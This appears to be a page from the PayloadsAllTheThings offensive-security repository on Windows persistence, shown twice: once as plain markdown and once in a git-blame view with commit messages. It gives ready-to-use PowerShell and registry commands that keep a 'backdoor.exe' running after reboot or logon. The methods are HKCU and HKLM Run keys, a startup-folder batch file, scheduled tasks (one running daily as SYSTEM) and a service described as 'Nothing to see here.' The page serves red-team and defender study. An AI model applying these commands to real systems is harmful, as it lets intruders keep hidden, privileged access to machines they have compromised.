PayloadsAllTheThings/Methodology and Resources/Windows - Persistence.md

# Windows - Persistence

## Userland

### Registry

Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.

```powershell
Value name:  Backdoor
Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```

### Startup

Create a batch script in the user startup folder.

```powershell
PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat
start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
```

### Scheduled Task

```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"
PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```

## Elevated

### HKLM

Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.

```powershell
Value name:  Backdoor
Value data:  C:\Windows\Temp\backdoor.exe
```

### Services

Create a service that will start automatically or on-demand.

```powershell
PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."
```

### Scheduled Tasks

Scheduled Task to run as SYSTEM, everyday at 9am.

```powershell
PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"
PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am
PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest
PS C:\> $S = New-ScheduledTaskSettingsSet
PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
PS C:\> Register-ScheduledTask Backdoor -InputObject $D
```

## References

* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`# Windows - Persistence`

			`## Userland`

			`### Registry`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Value name: Backdoor`
			`Value data: C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`
			```

			`### Startup`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Create a batch script in the user startup folder.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\backdoor.bat`
			`start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe`
			```

			`### Scheduled Task`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Users\Rasta\AppData\Local\Temp\backdoor.exe"`
			`PS C:\> $T = New-ScheduledTaskTrigger -AtLogOn -User "Rasta"`
			`PS C:\> $P = New-ScheduledTaskPrincipal "Rasta"`
			`PS C:\> $S = New-ScheduledTaskSettingsSet`
			`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`
			`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`
			```

			`## Elevated`

			`### HKLM`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Similar to HKCU. Create a REG_SZ value in the Run key within HKLM\Software\Microsoft\Windows.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Value name: Backdoor`
			`Value data: C:\Windows\Temp\backdoor.exe`
			```

			`### Services`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Create a service that will start automatically or on-demand.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`PS C:\> New-Service -Name "Backdoor" -BinaryPathName "C:\Windows\Temp\backdoor.exe" -Description "Nothing to see here."`
			```

			`### Scheduled Tasks`
Markdown formatting update 2018-08-12 21:30:22 +00:00
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`Scheduled Task to run as SYSTEM, everyday at 9am.`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			```powershell
Oracle SQL + SQL injection updates (MS SQL/MYSQL/ GENERAL) 2018-04-27 21:31:58 +00:00			`PS C:\> $A = New-ScheduledTaskAction -Execute "cmd.exe" -Argument "/c C:\Windows\Temp\backdoor.exe"`
			`PS C:\> $T = New-ScheduledTaskTrigger -Daily -At 9am`
			`PS C:\> $P = New-ScheduledTaskPrincipal "NT AUTHORITY\SYSTEM" -RunLevel Highest`
			`PS C:\> $S = New-ScheduledTaskSettingsSet`
			`PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S`
			`PS C:\> Register-ScheduledTask Backdoor -InputObject $D`
			```

Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
			`* [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)`
			`* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)`